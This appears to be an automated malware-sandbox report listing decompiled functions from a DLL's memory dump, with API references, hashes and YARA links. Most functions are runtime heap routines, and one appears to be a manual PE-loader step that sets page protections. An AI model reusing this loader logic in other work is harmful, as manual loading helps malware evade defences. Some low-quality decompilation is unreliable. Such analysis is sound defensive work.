                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ac4a
                                                                                                                                                      0x1001abf4
                                                                                                                                                      0x1001abfa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001abfa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ad78
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001ABB2
                                                                                                                                                      • SetLastError.KERNEL32(0000007E), ref: 1001ABF4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLastRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4100373531-0
                                                                                                                                                      • Opcode ID: 59b7c28c5a6a2055bc3ad19a487945ad965c1c3e153a6a88f5d4a819af12ce5d
                                                                                                                                                      • Instruction ID: ee799e3b8b260964baacb2eb61f61a8d535858b77694984a1748e2a29b669165
                                                                                                                                                      • Opcode Fuzzy Hash: 59b7c28c5a6a2055bc3ad19a487945ad965c1c3e153a6a88f5d4a819af12ce5d
                                                                                                                                                      • Instruction Fuzzy Hash: ED81A3B4A00209DFDB04CF94D881AAEB7F1FF89355F248158E819AB351D735EA82CF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000C9E0, Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 16%
                                                                                                                                                      			E1000C9E0(intOrPtr* __eax, void* __edx, void* __edi) {
				intOrPtr* _t14;
				intOrPtr* _t17;
				intOrPtr _t20;
				intOrPtr _t36;
				intOrPtr* _t38;

				 *__eax =  *__eax + __edx;
				 *0xba =  *0xba + __edx;
				asm("rol dh, 0x0");
				asm("adc [edx+edi*4], ah");
				 *0xba =  *0xba + __edx;
				 *0x00000178 =  *((intOrPtr*)(0x178)) + __edx;
				asm("adc dl, al");
				 *((intOrPtr*)(0x178)) =  *((intOrPtr*)(0x178)) + __edx;
				 *((intOrPtr*)(0x178)) =  *((intOrPtr*)(0x178)) + __edx;
				_t14 = _t38;
				 *_t14 =  *_t14 + __edx;
				 *_t14 =  *_t14 + __edx;
				_push(es);
				 *_t14 =  *_t14 + __edx;
				asm("repne rol byte [eax], 0x10");
				asm("adc eax, ebp");
				 *_t14 =  *_t14 + __edx;
				asm("adc [ebx-0x40], ah");
				 *_t14 =  *_t14 + __edx;
				asm("adc [edx+0xc], ch");
				_push(0xc);
				_push(0x103301c0);
				_t15 = E10010534(__eax, __edi, 0xffffffffc29f1178);
				_t36 =  *0x00000180;
				if(_t36 != 0) {
					if( *0x10335f3c != 3) {
						_push(_t36);
						goto L8;
					} else {
						L1000FA03(4);
						 *0x00000174 =  *0x00000174 & 0x00000000;
						_t20 = E1000FA7C(_t36);
						 *0x0000015C = _t20;
						if(_t20 != 0) {
							_push(_t36);
							_push(_t20);
							E1000FAA7();
						}
						 *0x00000174 = 0xfffffffe;
						_t15 = E1000CA86();
						if( *((intOrPtr*)(0x15c)) == 0) {
							_push( *((intOrPtr*)(0x180)));
							L8:
							_push(0);
							_t15 = RtlFreeHeap( *0x10333310); // executed
							_t47 = _t15;
							if(_t15 == 0) {
								_t17 = E1000F720(_t47);
								 *_t17 = E1000F6E5(GetLastError());
							}
						}
					}
				}
				return E10010579(_t15);
			}








                                                                                                                                                      0x1000c9e2
                                                                                                                                                      0x1000c9ea
                                                                                                                                                      0x1000c9ec
                                                                                                                                                      0x1000c9ef
                                                                                                                                                      0x1000c9f2
                                                                                                                                                      0x1000c9f6
                                                                                                                                                      0x1000c9f8
                                                                                                                                                      0x1000c9fa
                                                                                                                                                      0x1000c9fe
                                                                                                                                                      0x1000ca00
                                                                                                                                                      0x1000ca06
                                                                                                                                                      0x1000ca0e
                                                                                                                                                      0x1000ca10
                                                                                                                                                      0x1000ca16
                                                                                                                                                      0x1000ca18
                                                                                                                                                      0x1000ca1c
                                                                                                                                                      0x1000ca1e
                                                                                                                                                      0x1000ca27
                                                                                                                                                      0x1000ca2a
                                                                                                                                                      0x1000ca2f
                                                                                                                                                      0x1000ca30
                                                                                                                                                      0x1000ca32
                                                                                                                                                      0x1000ca37
                                                                                                                                                      0x1000ca3c
                                                                                                                                                      0x1000ca41
                                                                                                                                                      0x1000ca4a
                                                                                                                                                      0x1000ca8f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ca4c
                                                                                                                                                      0x1000ca4e
                                                                                                                                                      0x1000ca54
                                                                                                                                                      0x1000ca59
                                                                                                                                                      0x1000ca5f
                                                                                                                                                      0x1000ca64
                                                                                                                                                      0x1000ca66
                                                                                                                                                      0x1000ca67
                                                                                                                                                      0x1000ca68
                                                                                                                                                      0x1000ca6e
                                                                                                                                                      0x1000ca6f
                                                                                                                                                      0x1000ca76
                                                                                                                                                      0x1000ca7f
                                                                                                                                                      0x1000ca81
                                                                                                                                                      0x1000ca90
                                                                                                                                                      0x1000ca90
                                                                                                                                                      0x1000ca98
                                                                                                                                                      0x1000ca9e
                                                                                                                                                      0x1000caa0
                                                                                                                                                      0x1000caa2
                                                                                                                                                      0x1000cab5
                                                                                                                                                      0x1000cab7
                                                                                                                                                      0x1000caa0
                                                                                                                                                      0x1000ca7f
                                                                                                                                                      0x1000ca4a
                                                                                                                                                      0x1000cabd

                                                                                                                                                      APIs
                                                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2661975262-0
                                                                                                                                                      • Opcode ID: c35be7ddd376820428f790f1a01076792734619c7c1b30ac8a6f5b23f6ddbc2b
                                                                                                                                                      • Instruction ID: f3614e2ed5c3b7a2523f888baaf654e085a5ac9fd5a4e10f0babc6e667b4755f
                                                                                                                                                      • Opcode Fuzzy Hash: c35be7ddd376820428f790f1a01076792734619c7c1b30ac8a6f5b23f6ddbc2b
                                                                                                                                                      • Instruction Fuzzy Hash: D921F17AA0E3C55FEB02CB705C957597F609F07295F0A009AE0849B1E7DB689C448BA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10019780, Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                      			E10019780(void* __ebx, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a36, intOrPtr* _a40, intOrPtr* _a44) {
				char _v8;
				char _v12;
				void* _t45;

				_v8 = 0;
				_v12 = 0;
				__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12, 0, 0, _a44); // executed
				if(GetLastError() == 0x7a) {
					 *_a40 = L1000CE56(__ebx, _a44, _t45, __esi,  *_a44);
					E1000CF20(_t45,  *_a40, 0,  *_a44);
					__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12,  *_a40,  *_a44, 0); // executed
					_v8 = 1;
				}
				return _v8;
			}






                                                                                                                                                      0x10019786
                                                                                                                                                      0x1001978d
                                                                                                                                                      0x100197ac
                                                                                                                                                      0x100197bb
                                                                                                                                                      0x100197ce
                                                                                                                                                      0x100197de
                                                                                                                                                      0x10019804
                                                                                                                                                      0x1001980a
                                                                                                                                                      0x1001980a
                                                                                                                                                      0x10019817

                                                                                                                                                      APIs
                                                                                                                                                      • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 100197AC
                                                                                                                                                      • GetLastError.KERNEL32 ref: 100197B2
                                                                                                                                                      • _memset.LIBCMT ref: 100197DE
                                                                                                                                                      • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019804
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DevicePropertyRegistrySetup$ErrorLast_memset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 895502402-0
                                                                                                                                                      • Opcode ID: 6adbbad0e525441aa34f394d1e709c810f69e4a50dd3602c5c2cb0cc2a6a471c
                                                                                                                                                      • Instruction ID: f8922b701b9361cc18bff0ab125b4374f9cfd65e033693ba824ef8b8be46b605
                                                                                                                                                      • Opcode Fuzzy Hash: 6adbbad0e525441aa34f394d1e709c810f69e4a50dd3602c5c2cb0cc2a6a471c
                                                                                                                                                      • Instruction Fuzzy Hash: 8C1193B9610208BBDB04DF98D895FDA77B9AB49304F108259F9099B284D631EA85CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000CA30, Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 27%
                                                                                                                                                      			E1000CA30(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x103301c0);
				_t8 = E10010534(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E10010579(_t8);
				}
				if( *0x10335f3c != 3) {
					_push(_t23);
					L7:
					_push(0);
					_t8 = RtlFreeHeap( *0x10333310); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E1000F720(_t31);
						 *_t10 = E1000F6E5(GetLastError());
					}
					goto L9;
				}
				L1000FA03(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E1000FA7C(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1000FAA7();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E1000CA86();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}







                                                                                                                                                      0x1000ca30
                                                                                                                                                      0x1000ca32
                                                                                                                                                      0x1000ca37
                                                                                                                                                      0x1000ca3c
                                                                                                                                                      0x1000ca41
                                                                                                                                                      0x1000cab8
                                                                                                                                                      0x1000cabd
                                                                                                                                                      0x1000cabd
                                                                                                                                                      0x1000ca4a
                                                                                                                                                      0x1000ca8f
                                                                                                                                                      0x1000ca90
                                                                                                                                                      0x1000ca90
                                                                                                                                                      0x1000ca98
                                                                                                                                                      0x1000ca9e
                                                                                                                                                      0x1000caa0
                                                                                                                                                      0x1000caa2
                                                                                                                                                      0x1000cab5
                                                                                                                                                      0x1000cab7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000caa0
                                                                                                                                                      0x1000ca4e
                                                                                                                                                      0x1000ca54
                                                                                                                                                      0x1000ca59
                                                                                                                                                      0x1000ca5f
                                                                                                                                                      0x1000ca64
                                                                                                                                                      0x1000ca66
                                                                                                                                                      0x1000ca67
                                                                                                                                                      0x1000ca68
                                                                                                                                                      0x1000ca6e
                                                                                                                                                      0x1000ca6f
                                                                                                                                                      0x1000ca76
                                                                                                                                                      0x1000ca7f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ca81
                                                                                                                                                      0x1000ca81
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ca81

                                                                                                                                                      APIs
                                                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2661975262-0
                                                                                                                                                      • Opcode ID: d759168b4be4b4469117ee5877101e11671dc200a8624a95c389703c63f9e0ca
                                                                                                                                                      • Instruction ID: 10b30a0b1b21ab9b25203a3b4f1cd3614836a259c78c12a13bfb3de2cf880016
                                                                                                                                                      • Opcode Fuzzy Hash: d759168b4be4b4469117ee5877101e11671dc200a8624a95c389703c63f9e0ca
                                                                                                                                                      • Instruction Fuzzy Hash: 94016775B0131A9AFB10DBB49C46B5E76A4DF013E5F104109F5049A0D5CF38A940DF56
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000CE64, Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 73%
                                                                                                                                                      			E1000CE64(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t1;
				void* _t2;
				void* _t6;
				void* _t10;
				void* _t12;
				void* _t18;
				void* _t20;
				void* _t22;
				intOrPtr _t24;
				void* _t28;
				void* _t30;
				void* _t32;

				_t18 = __edx;
				_t12 = HeapAlloc;
				do {
					_t32 =  *0x10333310; // 0x2380000
					_t20 = _t30;
					if(_t32 == 0) {
						E100119E6(_t12, _t18, _t20, _t32);
						E10011846(0x1e);
						E100115A8(0xff);
					}
					_t1 =  *0x10335f3c; // 0x1
					if(_t1 != 1) {
						__eflags = _t1 - 3;
						if(__eflags != 0) {
							L10:
							__eflags = _t30;
							if(_t30 == 0) {
								_t20 = 1;
								__eflags = 1;
							}
							_t22 = _t20 + 0x0000000f & 0xfffffff0;
							__eflags = _t22;
							_push(_t22);
							goto L13;
						} else {
							_push(_t30);
							_t2 = E1000CE07(_t12, _t20, 0, __eflags);
							__eflags = _t2;
							if(__eflags == 0) {
								goto L10;
							}
						}
					} else {
						if(_t30 == 0) {
							_t10 = 1;
							__eflags = 1;
						} else {
							_t10 = _t30;
						}
						_push(_t10);
						L13:
						_push(0);
						_t2 = RtlAllocateHeap( *0x10333310); // executed
					}
					_t28 = _t2;
					if(_t28 == 0) {
						_t24 = 0xc;
						if( *0x103337d4 == _t2) {
							 *((intOrPtr*)(E1000F720(__eflags))) = _t24;
							L19:
							 *((intOrPtr*)(E1000F720(_t37))) = _t24;
						} else {
							goto L16;
						}
					}
					return _t28;
					L16:
					_t6 = E100108CA(_t30);
					_t37 = _t6;
				} while (_t6 != 0);
				goto L19;
			}


















                                                                                                                                                      0x1000ce64
                                                                                                                                                      0x1000ce65
                                                                                                                                                      0x1000ce6d
                                                                                                                                                      0x1000ce6f
                                                                                                                                                      0x1000ce75
                                                                                                                                                      0x1000ce77
                                                                                                                                                      0x1000ce79
                                                                                                                                                      0x1000ce80
                                                                                                                                                      0x1000ce8a
                                                                                                                                                      0x1000ce90
                                                                                                                                                      0x1000ce91
                                                                                                                                                      0x1000ce99
                                                                                                                                                      0x1000cea9
                                                                                                                                                      0x1000ceac
                                                                                                                                                      0x1000ceb9
                                                                                                                                                      0x1000ceb9
                                                                                                                                                      0x1000cebb
                                                                                                                                                      0x1000cebf
                                                                                                                                                      0x1000cebf
                                                                                                                                                      0x1000cebf
                                                                                                                                                      0x1000cec3
                                                                                                                                                      0x1000cec3
                                                                                                                                                      0x1000cec6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ceae
                                                                                                                                                      0x1000ceae
                                                                                                                                                      0x1000ceaf
                                                                                                                                                      0x1000ceb4
                                                                                                                                                      0x1000ceb7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ceb7
                                                                                                                                                      0x1000ce9b
                                                                                                                                                      0x1000ce9d
                                                                                                                                                      0x1000cea5
                                                                                                                                                      0x1000cea5
                                                                                                                                                      0x1000ce9f
                                                                                                                                                      0x1000ce9f
                                                                                                                                                      0x1000ce9f
                                                                                                                                                      0x1000cea6
                                                                                                                                                      0x1000cec7
                                                                                                                                                      0x1000cec7
                                                                                                                                                      0x1000cece
                                                                                                                                                      0x1000cece
                                                                                                                                                      0x1000ced0
                                                                                                                                                      0x1000ced4
                                                                                                                                                      0x1000cede
                                                                                                                                                      0x1000cedf
                                                                                                                                                      0x1000cef3
                                                                                                                                                      0x1000cef5
                                                                                                                                                      0x1000cefa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000cedf
                                                                                                                                                      0x1000cf02
                                                                                                                                                      0x1000cee1
                                                                                                                                                      0x1000cee2
                                                                                                                                                      0x1000cee7
                                                                                                                                                      0x1000cee9
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • __FF_MSGBANNER.LIBCMT ref: 1000CE79
                                                                                                                                                        • Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A0D
                                                                                                                                                        • Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A17
                                                                                                                                                      • __NMSG_WRITE.LIBCMT ref: 1000CE80
                                                                                                                                                        • Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118B2
                                                                                                                                                        • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 100118C3
                                                                                                                                                        • Part of subcall function 10011846: GetModuleFileNameA.KERNEL32(00000000,103334D9,00000104,?,103332E0,00000000), ref: 100118DF
                                                                                                                                                        • Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118F4
                                                                                                                                                        • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 10011907
                                                                                                                                                        • Part of subcall function 10011846: _strlen.LIBCMT ref: 10011910
                                                                                                                                                        • Part of subcall function 10011846: _strlen.LIBCMT ref: 1001191D
                                                                                                                                                        • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 1001194A
                                                                                                                                                        • Part of subcall function 100115A8: ___crtCorExitProcess.LIBCMT ref: 100115AC
                                                                                                                                                        • Part of subcall function 100115A8: ExitProcess.KERNEL32 ref: 100115B6
                                                                                                                                                        • Part of subcall function 1000CE07: ___sbh_alloc_block.LIBCMT ref: 1000CE2F
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 1000CECE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$AllocateFileHeapModuleName___crt___sbh_alloc_block
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3791426274-0
                                                                                                                                                      • Opcode ID: ac007278a4e0de9d752827624b5274de92f56d31190f61e6d2d2646ba59319ec
                                                                                                                                                      • Instruction ID: 6f1a83c6d6f502121b77b2a43b6d62c081e19aaa5c93b61cf19e771af3aa1e29
                                                                                                                                                      • Opcode Fuzzy Hash: ac007278a4e0de9d752827624b5274de92f56d31190f61e6d2d2646ba59319ec
                                                                                                                                                      • Instruction Fuzzy Hash: 5401F936B493EE9AF221D765DCC1D6E72CDDBC16F0F220126F948CA59ACB60DC8142E1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001B1C0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                      			E1001B1C0(intOrPtr* _a4, void** _a8) {
				long _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				int _t67;

				if(_a8[2] != 0) {
					_t4 =  &(_a8[3]); // 0x1
					if(( *_t4 & 0x02000000) == 0) {
						_t31 =  &(_a8[3]); // 0x1
						asm("sbb edx, edx");
						_v16 =  ~( ~( *_t31 & 0x20000000));
						_t34 =  &(_a8[3]); // 0x1
						asm("sbb ecx, ecx");
						_v24 =  ~( ~( *_t34 & 0x40000000));
						_t37 =  &(_a8[3]); // 0x1
						asm("sbb eax, eax");
						_v12 =  ~( ~( *_t37 & 0x80000000));
						_t42 = _v24 * 8; // 0x2034e6cd
						_v20 =  *((intOrPtr*)((_v16 << 4) + _t42 + 0x103330c4 + _v12 * 4));
						_t49 =  &(_a8[3]); // 0x1
						if(( *_t49 & 0x04000000) != 0) {
							_v20 = _v20 | 0x00000200;
						}
						_t55 =  &(_a8[2]); // 0xb805ebc0
						_t67 = VirtualProtect( *_a8,  *_t55, _v20,  &_v8); // executed
						if(_t67 != 0) {
							return 1;
						} else {
							_push("Error protecting memory page");
							E1001AE60(_t67);
							return 0;
						}
					}
					_t7 =  &(_a8[1]); // 0x330475c0
					if( *_a8 !=  *_t7) {
						L8:
						return 1;
					}
					if(_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x3c)) {
						L7:
						_t26 =  &(_a8[2]); // 0xb805ebc0
						 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))( *_a8,  *_t26, 0x4000,  *((intOrPtr*)(_a4 + 0x34))); // executed
						goto L8;
					} else {
						_t16 =  &(_a8[2]); // 0xb805ebc0
						if( *_t16 %  *(_a4 + 0x3c) != 0) {
							goto L8;
						}
						goto L7;
					}
				}
				return 1;
			}









                                                                                                                                                      0x1001b1cd
                                                                                                                                                      0x1001b1dc
                                                                                                                                                      0x1001b1e5
                                                                                                                                                      0x1001b250
                                                                                                                                                      0x1001b25b
                                                                                                                                                      0x1001b25f
                                                                                                                                                      0x1001b265
                                                                                                                                                      0x1001b270
                                                                                                                                                      0x1001b274
                                                                                                                                                      0x1001b27a
                                                                                                                                                      0x1001b284
                                                                                                                                                      0x1001b288
                                                                                                                                                      0x1001b294
                                                                                                                                                      0x1001b2a1
                                                                                                                                                      0x1001b2a7
                                                                                                                                                      0x1001b2b0
                                                                                                                                                      0x1001b2bb
                                                                                                                                                      0x1001b2bb
                                                                                                                                                      0x1001b2c9
                                                                                                                                                      0x1001b2d3
                                                                                                                                                      0x1001b2db
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b2dd
                                                                                                                                                      0x1001b2dd
                                                                                                                                                      0x1001b2e2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b2ea
                                                                                                                                                      0x1001b2db
                                                                                                                                                      0x1001b1ef
                                                                                                                                                      0x1001b1f2
                                                                                                                                                      0x1001b243
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b243
                                                                                                                                                      0x1001b1fb
                                                                                                                                                      0x1001b21f
                                                                                                                                                      0x1001b22e
                                                                                                                                                      0x1001b23e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b20d
                                                                                                                                                      0x1001b213
                                                                                                                                                      0x1001b21d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b21d
                                                                                                                                                      0x1001b1fb
                                                                                                                                                      0x00000000

                                                                                                                                                      Strings
                                                                                                                                                      • Error protecting memory page, xrefs: 1001B2DD
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Error protecting memory page
                                                                                                                                                      • API String ID: 0-1748499907
                                                                                                                                                      • Opcode ID: fa3f9b01b46355d1ec19b93347b7561b613cc618b83ed61fa7cf9da906a09f9b
                                                                                                                                                      • Instruction ID: 8d650c0da19698877930e2c5171e1c21c57976ae84b1b649a9511697b3bf2f19
                                                                                                                                                      • Opcode Fuzzy Hash: fa3f9b01b46355d1ec19b93347b7561b613cc618b83ed61fa7cf9da906a09f9b
                                                                                                                                                      • Instruction Fuzzy Hash: EB41D774A005099FD748DF58C490BA9B3B2FB88310F14C259EC1A8F355C731EE85CB80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000F7BF, Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1000F7BF(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10333310 = _t6;
				if(_t6 != 0) {
					_t7 = E1000F764(__eflags);
					__eflags = _t7 - 3;
					 *0x10335f3c = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E1000FA34(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x10333310);
							 *0x10333310 =  *0x10333310 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}






                                                                                                                                                      0x1000f7d0
                                                                                                                                                      0x1000f7d8
                                                                                                                                                      0x1000f7dd
                                                                                                                                                      0x1000f7e2
                                                                                                                                                      0x1000f7e7
                                                                                                                                                      0x1000f7ea
                                                                                                                                                      0x1000f7ef
                                                                                                                                                      0x1000f815
                                                                                                                                                      0x1000f817
                                                                                                                                                      0x1000f818
                                                                                                                                                      0x1000f7f1
                                                                                                                                                      0x1000f7f6
                                                                                                                                                      0x1000f7fb
                                                                                                                                                      0x1000f7fe
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000f800
                                                                                                                                                      0x1000f806
                                                                                                                                                      0x1000f80c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000f80c
                                                                                                                                                      0x1000f7fe
                                                                                                                                                      0x1000f7df
                                                                                                                                                      0x1000f7df
                                                                                                                                                      0x1000f7e1
                                                                                                                                                      0x1000f7e1

                                                                                                                                                      APIs
